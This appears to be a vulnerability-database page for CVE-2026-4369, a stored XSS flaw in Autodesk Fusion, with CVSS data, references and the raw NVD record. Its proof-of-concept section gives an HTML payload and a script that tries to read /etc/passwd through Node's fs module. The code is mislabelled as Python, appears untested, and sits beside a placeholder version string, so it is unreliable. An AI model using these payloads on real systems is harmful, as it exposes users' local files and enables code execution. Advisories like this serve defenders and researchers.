CVE-2026-4369

Description

A maliciously crafted HTML payload in an assembly variant name, when displayed during the delete confirmation dialog and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:autodesk:fusion:*:*:*:*:*:*:*:* - VULNERABLE

Autodesk Fusion < 修复版本 (请参考官方公告 ADSK-SA-2026-0005)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Malicious HTML payload for Assembly Variant Name -->
<img src=x onerror="alert('CVE-2026-4369 XSS Triggered');">

<!-- Advanced payload attempting to read local files (assuming Electron/Node context) -->
<script>
  // Attempt to read a file if Node integration is enabled
  try {
    const fs = require('fs');
    alert(fs.readFileSync('/etc/passwd').toString());
  } catch (e) {
    console.log('Sandbox escape failed or restricted');
  }
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4369
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4369
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4369/
[4] VulDB https://vuldb.com/cve/CVE-2026-4369
[5] https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.dmg
[6] https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.exe
[7] https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0005

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4369", "sourceIdentifier": "[email protected]", "published": "2026-04-14T15:16:38.943", "lastModified": "2026-04-22T15:12:45.310", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A maliciously crafted HTML payload in an assembly variant name, when displayed during the delete confirmation dialog and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:autodesk:fusion:*:*:*:*:*:*:*:*", "versionEndExcluding": "2702.1.47", "matchCriteriaId": "04D4CA6B-72DC-47B4-8CD4-9702E5055DF0"}]}]}], "references": [{"url": "https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.dmg", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.exe", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0005", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}